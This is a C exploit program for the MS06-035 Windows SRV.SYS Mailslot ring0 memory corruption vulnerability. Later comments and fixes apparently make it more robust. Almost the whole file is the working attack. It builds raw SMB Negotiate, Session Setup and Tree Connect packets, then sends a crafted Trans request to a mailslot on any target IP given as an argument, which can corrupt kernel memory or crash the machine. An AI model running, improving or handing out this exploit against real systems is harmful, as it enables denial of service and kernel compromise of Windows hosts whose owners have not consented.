# Title : MS Windows Mailslot Ring0 Memory Corruption Exploit (MS06-035)
# Published : 2006-07-21
# Author : cocoruder
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>
/*******************************************************************
Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(MS06-035) Exploit
by cocoruder(frankruder_at_hotmail.com),2006.7.19
page:http://ruder.cdut.net
*******************************************************************/
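/*
 * Raw SMB-over-NetBIOS requests, sent verbatim on the TCP session in the
 * order they appear here.  All four share the layout the bytes show:
 *
 *   bytes 0-3   NetBIOS session header; byte 3 is the length of everything
 *               after it (0x2f = 51-4, 0x48 = 76-4, 0x58 = 92-4, 0x56 = 90-4)
 *   bytes 4-7   "\xffSMB", followed by the SMB command byte at offset 8
 *   bytes 4-35  the 32-byte SMB header; per its layout the TID sits at
 *               SMB offset 0x18 (absolute 0x1c) and the UID at SMB offset
 *               0x1c (absolute 0x20), which are the two offsets main()
 *               reads from the replies and patches into later requests
 *
 * The arrays are string literals, so sizeof() counts a trailing NUL that
 * is not part of the packet; every send() must use sizeof(x) - 1.  They
 * are deliberately not const: main() writes the server-assigned UID into
 * TreeConnect_AndX_Request and Trans_Request, and the TID into
 * Trans_Request, before sending them.
 *
 * Note: in the archived copy every "\x" escape had lost its backslash, so
 * the arrays were ASCII text of the wrong length and byte 3 no longer
 * matched the payload size.  The escapes are restored here.
 */

/* Negotiate Protocol (command 0x72).  The only text it carries is the
 * dialect string "NT LM 0.12"; byte count 0x0c covers "\x02NT LM 0.12\0". */
unsigned char SmbNeg[] =
"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
"\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";

/* Session Setup AndX (command 0x73).  TID is 0xffff (no tree yet).  No
 * account name or password is present; the only strings are "nt" and
 * "pysmb".  The reply's UID is what main() needs from this exchange. */
unsigned char Session_Setup_AndX_Request[]=
"\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
"\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff"
"\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d"
"\x62\x00";

/* Tree Connect AndX (command 0x75).  The path is UTF-16
 * "\\172.22.5.46\IPC$" followed by the service string "?????".
 * NOTE(review): the host part of that path is the author's test address,
 * hard-coded; main() only patches the UID at offset 0x20 and never
 * rewrites the path from argv[1].  Confirm the target accepts a path
 * whose host does not match before relying on this. */
unsigned char TreeConnect_AndX_Request[]=
"\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00"
"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08"
"\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00"
"\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f"
"\x3f\x00";

/* Transaction (command 0x25).  Both TID (0x1c) and UID (0x20) hold
 * placeholders that main() overwrites.  The byte count 0x11 covers exactly
 * the 17-byte name "\MAILSLOT\LANMANA", which has no NUL terminator
 * inside the packet; the listing does not say whether that is what
 * matters for the bug, so nothing here should be read as an explanation. */
unsigned char Trans_Request[]=
"\x00\x00\x00\x56\xff\x53\x4d\x42\x25\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x08\x88\x05\x00\x08\x00\x00\x11\x00\x00\x01\x00\x00"
"\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55"
"\x00\x01\x00\x55\x00\x03\x00\x01\x00\x00\x00\x00\x00\x11\x00\x5c"
"\x4d\x41\x49\x4c\x53\x4c\x4f\x54\x5c\x4c\x41\x4e\x4d\x41\x4e\x41";

/* Shared reply buffer for every recv() in main(); zero-initialized because
 * it has static storage, but a reply shorter than the offset being read
 * still leaves stale or zero bytes there, so callers must check lengths. */
unsigned char recvbuff[2048];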
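/*
 * Send the raw Negotiate Protocol request (SmbNeg) on socket s.
 * The reply is not read here; the caller recv()s it afterwards.
 *
 * s stays an int for compatibility with the existing caller even though
 * main() holds a SOCKET; on 64-bit Windows SOCKET is wider than int, so
 * the handle is truncated on the way in.
 *
 * Fixes versus the original: the 1 KiB local buffer that was memset and
 * never used is gone, and the result of send() is no longer ignored.
 */
void neg(int s)
{
    /* sizeof - 1: the array is a string literal whose trailing NUL is not
     * part of the packet. */
    int sent = send(s, (const char *)SmbNeg, (int)(sizeof(SmbNeg) - 1), 0);

    /* send() returns -1 on failure.  A short send on the stream socket is
     * not retried, only reported; the caller's recv() will then likely fail
     * as well, since the server never saw a complete request. */
    if (sent < 0 || (size_t)sent != sizeof(SmbNeg) - 1) {
        printf("send SmbNeg error!\n");
    }
}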
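/*
 * Offsets, in the raw packets and in the replies held in recvbuff, of the
 * two fields main() copies from the server.  Every packet starts with a
 * 4-byte NetBIOS session header (byte 3 = length of the rest), so these are
 * 4 past the SMB-header positions 0x18 (TID) and 0x1c (UID); they equal the
 * 0x1c / 0x20 the original hard-coded next to "get treeid" / "get userid".
 */
enum {
    NB_HDR_LEN = 4,
    TID_OFFSET = NB_HDR_LEN + 0x18,   /* 0x1c */
    UID_OFFSET = NB_HDR_LEN + 0x1c    /* 0x20 */
};

/*
 * Send one raw request in full.  Returns 0 on success, or -1 after printing
 * "send <what> error!" (the original's wording).  send() returns -1 on
 * failure; a short send on the stream socket is not retried, it is reported
 * rather than silently continuing with a truncated packet on the wire.
 */
static int smb_send(SOCKET s, const unsigned char *req, size_t len, const char *what)
{
    int n = send(s, (const char *)req, (int)len, 0);

    if (n < 0 || (size_t)n != len) {
        printf("send %s error!\n", what);
        return -1;
    }
    return 0;
}

/*
 * Read one reply into recvbuff, clearing it first so bytes left over from
 * an earlier reply can never be mistaken for this one.  Returns the byte
 * count received, or -1 if recv() failed, the peer closed, or fewer than
 * `need` bytes arrived -- in which case the caller must not read the field
 * it was after.  One recv() per reply, as in the original: a reply split
 * across TCP segments is not reassembled, and no receive timeout is set,
 * so this blocks until data or close.
 */
static int smb_recv(SOCKET s, size_t need, const char *what)
{
    int n;

    memset(recvbuff, 0, sizeof(recvbuff));
    n = recv(s, (char *)recvbuff, (int)sizeof(recvbuff), 0);
    if (n <= 0 || (size_t)n < need) {
        printf("recv %s response error!\n", what);
        return -1;
    }
    return n;
}

/*
 * Usage: <prog> <target ip> <port>
 *
 * Drives the four requests in order: Negotiate, Session Setup, Tree Connect
 * (taking the UID from the session-setup reply), then the Trans request
 * (with that UID and the TID from the tree-connect reply patched in).
 *
 * Returns 0 when every request was sent and the first three were answered,
 * 1 on a usage error or any Winsock / send / recv failure.  The final
 * reply is reported but never treated as an error: a target that the last
 * request crashes may not answer at all.
 *
 * Fixes versus the original: argc is checked before argv is read; the port
 * is range-checked; the socket test is against INVALID_SOCKET (SOCKET is
 * unsigned, so `sock <= 0` could only ever catch 0); results are held in a
 * signed int (the original's DWORD turned send()'s -1 into a large positive
 * value, so `ret <= 0` never detected a failed send); every recv() length is
 * checked before the UID/TID offsets are read; the 2-byte fields are copied
 * with memcpy instead of an unaligned, aliasing WORD* dereference; the
 * socket and Winsock are cleaned up on every path; the "\n" escapes lost in
 * the archived copy are restored.
 */
int main(int argc, char **argv)
{
    struct sockaddr_in server;
    SOCKET sock = INVALID_SOCKET;
    WSADATA ws;
    WORD userid, treeid;
    long port;
    char *end;
    int n, rc = 1;

    if (argc < 3) {
        printf("usage: %s <target ip> <port>\n", argv[0]);
        return 1;
    }

    /* strtol rather than atoi so "0", junk and out-of-range values are
     * rejected instead of silently becoming port 0 or a truncated value. */
    port = strtol(argv[2], &end, 10);
    if (end == argv[2] || *end != '\0' || port < 1 || port > 65535) {
        printf("bad port: %s\n", argv[2]);
        return 1;
    }

    if (WSAStartup(MAKEWORD(2, 2), &ws) != 0) {
        printf("WSAStartup error!\n");
        return 1;
    }

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == INVALID_SOCKET) {
        printf("socket error!\n");
        goto out;
    }

    memset(&server, 0, sizeof(server));
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = inet_addr(argv[1]);
    if (server.sin_addr.s_addr == INADDR_NONE) {
        printf("bad address: %s\n", argv[1]);
        goto out;
    }
    server.sin_port = htons((USHORT)port);

    if (connect(sock, (struct sockaddr *)&server, sizeof(server)) != 0) {
        printf("connect error!\n");
        goto out;
    }

    /* 1. Negotiate.  Only the fact that a reply arrived is used. */
    if (smb_send(sock, SmbNeg, sizeof(SmbNeg) - 1, "SmbNeg") < 0 ||
        smb_recv(sock, 1, "SmbNeg") < 0) {
        goto out;
    }

    /* 2. Session setup.  The reply must be long enough to contain the UID,
     *    which the next two requests carry. */
    if (smb_send(sock, Session_Setup_AndX_Request,
                 sizeof(Session_Setup_AndX_Request) - 1,
                 "Session_Setup_AndX_Request") < 0 ||
        smb_recv(sock, UID_OFFSET + sizeof(userid),
                 "Session_Setup_AndX_Request") < 0) {
        goto out;
    }
    memcpy(&userid, recvbuff + UID_OFFSET, sizeof(userid));
    memcpy(TreeConnect_AndX_Request + UID_OFFSET, &userid, sizeof(userid));

    /* 3. Tree connect; take the TID from the reply. */
    if (smb_send(sock, TreeConnect_AndX_Request,
                 sizeof(TreeConnect_AndX_Request) - 1,
                 "TreeConnect_AndX_Request") < 0 ||
        smb_recv(sock, TID_OFFSET + sizeof(treeid),
                 "TreeConnect_AndX_Request") < 0) {
        goto out;
    }
    memcpy(&treeid, recvbuff + TID_OFFSET, sizeof(treeid));
    memcpy(Trans_Request + UID_OFFSET, &userid, sizeof(userid));
    memcpy(Trans_Request + TID_OFFSET, &treeid, sizeof(treeid));

    /* 4. The Trans request with both fields patched in. */
    if (smb_send(sock, Trans_Request, sizeof(Trans_Request) - 1,
                 "Trans_Request") < 0) {
        goto out;
    }

    /* The original also did one final recv() and ignored the result.  A
     * failed or empty reply here is informational only (see above); note
     * that with no receive timeout this can block until the peer closes. */
    n = recv(sock, (char *)recvbuff, (int)sizeof(recvbuff), 0);
    printf("Trans_Request sent, %d byte(s) in reply\n", n);
    rc = 0;

out:
    if (sock != INVALID_SOCKET) {
        closesocket(sock);
    }
    WSACleanup();
    return rc;
}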